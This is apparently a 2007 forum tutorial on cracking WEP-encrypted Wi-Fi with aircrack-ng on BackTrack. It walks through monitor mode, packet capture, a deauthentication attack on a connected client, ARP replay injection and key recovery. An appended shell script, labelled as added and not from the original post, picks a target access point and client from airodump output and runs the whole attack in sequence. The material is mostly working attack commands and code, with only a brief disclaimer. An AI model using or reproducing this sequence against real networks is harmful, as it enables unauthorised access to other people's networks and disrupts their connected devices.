AIRCRACK
ON BACKTRACK WITH CLIENTS (WEP)
OK, this tutorial should be pretty straightforward and easy; then again,
that's the entire idea behind a tutorial, right? Anyway, to business: this
tutorial will show you how to crack WEP very quickly using aircrack-ng on
the BackTrack security live CD, which you can find here;
http://www.remote-exploit.org/backtrack.html
**Quick note: cracking WEP with no clients will be out tonight/sometime
real soon**
We will go over
1) Putting your Atheros-based card into monitor mode
2) Getting packet injection ready
3) Injecting/sniffing
4) Cracking the WEP key
This is the easier method, the one where the WEP network has clients
present, so you can use a deauth attack on them. OK, enough talk, to
business!
Monitor Mode
The first thing to do is boot up BackTrack, basically by booting from the
CD like you normally would; if you can't figure this out, ask down below,
or go use Google. Log in to BackTrack as root (password 'toor'), and then
type "startx" at the command line to start the GUI. Sweet, now we are
running *nix, and we can start the good stuff. Open up a command line by
clicking on the icon that looks like one on the bottom, next to the
'start'-type thingy (let me know if I get too technical :) )
Now, we need to enter this into the command line;
Code:
$ airmon-ng start wifi0 6
**starts a monitor-mode interface (ath1) on wifi0 on channel 6; change 6 to
the channel of the network you are attacking, use kismet to find it, not
covered in this tutorial**
$ wlanconfig ath0 destroy
**removes the managed-mode interface madwifi creates by default, so it can't
interfere with injection**
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor channel 6
**iwconfig needs the word "channel" in front of the number**
Sweet, now we have our card in monitor mode, and we can move onto
bigger and better things.
Start up airodump and get some info ready
OK, let's start airodump so we can get some info out of it, and then we
can just leave it running.
Code:
$ airodump-ng --ivs --write bob --channel 6 ath1
**basically here's what each thing means;
--ivs= save only the captured IVs (the part of each packet aircrack needs),
not every whole packet, so the file stays small
--write= the prefix of the file we are writing to; airodump numbers it, so
you get bob-01.ivs, which is why the crack step uses *.ivs
--channel= the channel to capture on (lock it here, otherwise airodump hops
channels and misses most of the traffic)
ath1= our monitor-mode interface**
Now that airodump is running, we need to snag a couple of pieces of
information from it: 1) the MAC address (BSSID) of the AP we are attacking;
it is in the first column of the top table. 2) The MAC address of a computer
connected to that network; it is in the STATION column of the lower table,
on a row whose BSSID column shows our AP (a row marked "(not associated)"
is no good to us).
Now, open up a new terminal (DON'T CLOSE AIRODUMP) and type these lines in;
Code:
$ export AP=mac_of_ap
$ export MAC=mac_of_connected_computer
This just stores those two MAC addresses (colon-separated, exactly as
airodump shows them) in shell variables, so you don't have to type them a
bunch of times in the coming steps.
Getting everything ready
Good, now we have airodump running, and we can move on to getting packet
injection ready. In the new console we opened to set those variables, type
in the following, but do NOT run it yet;
Code:
$ aireplay-ng -0 10 -a $AP -c $MAC ath1
OK, this is aireplay-ng attack 0 run ten times ("-0 10"), which is a
deauthentication (deauth) attack: it sends forged deauth frames that kick
the client off the network. When the client reconnects it normally sends
ARP requests, and those are the packets we want to capture and replay.
"-a" is the MAC address of the AP we are attacking that we stored before,
"-c" is the client we are deauthing, and again ath1 is our interface.
Now, let's get aireplay ready to snag those ARP packets;
Code:
$ aireplay-ng -3 -b $AP -h $MAC ath1
Really quickly, this is attack number 3, the ARP request replay. "-b" is
the AP's MAC, and "-h" is the source MAC to inject with; we use the
connected client's MAC so the AP accepts our frames. It waits until it sees
an ARP request it can replay, then re-injects it over and over; the AP
answers every copy with a freshly encrypted packet, so each one gives us a
new IV. If your version asks whether to use the packet it found, say yes
(type y, press enter).
Good, everything is ready, on to the actual thing!
The Attack!
Now we have 2 attacks just chillin' there ready to go, and airodump still
running in the background. Start attack number 3 (the replay) first, so it
is already listening, then run your deauth attack. The replay attack will
eventually find an ARP packet (if it asks whether to use that one, type y).
Now look at airodump!
The #data column should be shooting up on the AP you are attacking! It
took me about 3 minutes to collect 100k data, more than enough for a
64-bit WEP key. Now, to crack the key, we need to type in one more
command and wait less than a minute. You don't have to close anything or
stop airodump/aireplay.
Go to the window we used for the deauth attack, and type in this command;
Code:
$ aircrack-ng -n 64 -b $AP *.ivs
("-n 64" is the key length in bits, "-b" picks our AP out of the capture,
and *.ivs matches whatever airodump named the file.)
Poof, aircrack should start, and in a few moments you should have your WEP
key! If not, wait a bit longer for more #data and run it again. If all
else fails, it might be a 128-bit key: you will need far more #data
(around a million for this method), so change "-n 64" to "-n 128" and try
again. If you don't get it then, I don't know what to tell you!
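Added example, not code from the original post: a POSIX sh wrapper for the whole sequence above, from picking the two MAC addresses off airodump-ng's output to the crack command. It assumes the card is already in monitor mode on the target channel and that you have airodump-ng's text dump (prefix-01.csv) for the session; if your release only produced the .ivs file, run airodump-ng once without --ivs to get one. The column layout follows airodump-ng's CSV format, the rows in sample_csv are constructed, and the function names (valid_mac, pick_targets, attack_commands, run_attack, sample_csv) are mine.

```sh
#!/bin/sh
# Added example for the WEP-with-clients walk-through; not from the original post.
# Assumes: interface already in monitor mode on the target channel, and an
# airodump-ng text dump (<prefix>-01.csv) for the session. Column layout follows
# airodump-ng's CSV format; the rows in sample_csv are constructed.

# valid_mac MAC: succeed only for a well-formed aa:bb:cc:dd:ee:ff (any case).
valid_mac() {
    printf '%s\n' "$1" | grep -Eqi '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# pick_targets CSV CHANNEL: print "BSSID CLIENT" for the first WEP access point
# on CHANNEL that has an associated station, i.e. the two values the post has
# you read off the airodump-ng screen. Stations listed as "(not associated)"
# are skipped: the AP would not accept frames sent with their MAC.
pick_targets() {
    awk -F', *' -v ch="$2" '
        /^Station MAC/ { sect = "sta"; next }
        /^BSSID/       { sect = "ap";  next }
        sect == "ap"  && $4 == ch && $6 ~ /WEP/ { ap[$1] = 1 }   # channel, Privacy
        sect == "sta" && ($6 in ap) && !done    { print $6, $1; done = 1 }
    ' "$1"
}

# attack_commands AP CLIENT IFACE CHANNEL PREFIX: print the post's four commands
# in the order they must be started (capture, ARP replay, deauth, crack).
# Returns 2 without printing anything if either MAC is malformed, so a typo
# never reaches the radio.
attack_commands() {
    ap=$1 client=$2 iface=$3 chan=$4 prefix=$5
    valid_mac "$ap" && valid_mac "$client" || return 2
    printf '%s\n' \
        "airodump-ng --ivs --write $prefix --channel $chan $iface" \
        "aireplay-ng -3 -b $ap -h $client $iface" \
        "aireplay-ng -0 10 -a $ap -c $client $iface" \
        "aircrack-ng -n 64 -b $ap ${prefix}*.ivs"
}

# run_attack AP CLIENT IFACE CHANNEL PREFIX: actually run the sequence. The
# long-running tools go to the background; the deauth waits a few seconds so
# the replay attack is already listening when the client re-ARPs. Lab use only.
run_attack() {
    attack_commands "$@" >/dev/null || return $?
    ap=$1 client=$2 iface=$3 chan=$4 prefix=$5
    airodump-ng --ivs --write "$prefix" --channel "$chan" "$iface" &
    aireplay-ng -3 -b "$ap" -h "$client" "$iface" &
    sleep 5
    aireplay-ng -0 10 -a "$ap" -c "$client" "$iface"
    aircrack-ng -n 64 -b "$ap" "$prefix"*.ivs
}

# sample_csv: constructed airodump-ng style dump with one WEP AP on channel 6,
# one WPA2 AP on channel 11, one unassociated station and one real client.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2007-05-01 20:00:01, 2007-05-01 20:05:00,  6,  54, WEP , WEP, , -40,  120,  2000,   0.  0.  0.  0,  6, lab-ap, 
66:77:88:99:AA:BB, 2007-05-01 20:00:02, 2007-05-01 20:05:00, 11,  54, WPA2, CCMP, PSK, -60,   80,     0,   0.  0.  0.  0,  8, neighbor, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2007-05-01 20:00:10, 2007-05-01 20:04:59, -50,  300, (not associated), lab-ap
AA:BB:CC:DD:EE:02, 2007-05-01 20:00:12, 2007-05-01 20:05:00, -45, 1500, 00:11:22:33:44:55, 
EOF
}

# Usage: sample_csv > dump.csv; set -- $(pick_targets dump.csv 6)
#        attack_commands "$1" "$2" ath1 6 bob    # review the lines, then run_attack ...
```

attack_commands prints rather than runs so you can eyeball the exact aireplay-ng lines before anything touches the air; run_attack is the same sequence for real, with the replay started ahead of the deauth as the post insists.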
I hope you learned something or got an idea of something, and that you
enjoyed yourself! Remember, soon I will be posting cracking WEP on a network
with no clients present.
**Obligatory disclaimer: this tutorial was written as an educational piece;
cracking into somebody else's network is illegal and punishable by
fine/jail. Don't be stupid.**
Original Tutorial
by jaymill230 for TheTAZZone-TAZForum
Originally posted on May 1st, 2007 here
Do not use, republish, in whole or in part, without the consent of
the Author. TheTAZZone policy is that Authors retain the rights to the
work they submit and/or post...we do not sell, publish, transmit, or
have the right to give permission for such...TheTAZZone merely retains
the right to use, retain, and publish submitted work within its
Network.

